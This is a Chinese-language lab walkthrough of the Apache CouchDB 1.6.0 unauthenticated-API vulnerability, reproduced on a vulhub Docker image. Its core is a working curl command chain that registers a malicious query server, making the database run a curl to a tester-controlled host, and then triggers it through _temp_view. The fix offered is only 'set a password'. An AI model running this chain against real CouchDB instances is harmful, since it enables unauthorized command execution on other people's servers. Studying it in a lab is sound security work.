前言

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）,默认会在5984端口开放Restful的API接口，如果使用SSL的话就会监听在6984端口，用于数据库的管理功能。其HTTP Server默认开启时没有进行验证，而且绑定在0.0.0.0，所有用户均可通过API访问导致未授权访问。

在官方配置文档中对HTTP Server的配置有WWW-Authenticate：Set this option to trigger basic-auth popup on unauthorized requests，但是很多用户都没有这么配置，导致漏洞产生。

环境搭建

创建docker-compose.yml文件，写入内容

version: '2' services: couchdb: image: vulhub/couchdb:1.6.0 ports: - "5984:5984"

docker-compose up -d

nmap扫描

nmap -sV -p- 192.168.111.129

curl http://192.168.111.129:5984

curl http://192.168.111.129:5984/_config

本机python运行http服务

python -m SimpleHTTPServer 9999

 

#依次执行如下命令

curl -X PUT 'http://192.168.111.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.111.138:9999/test.php"' curl -X PUT 'http://192.168.18.129:5984/vultest' curl -X PUT 'http://192.168.111.129:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}' curl -X POST 'http://192.168.111.129:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'

 

成功执行

 

修复建议

设置访问密码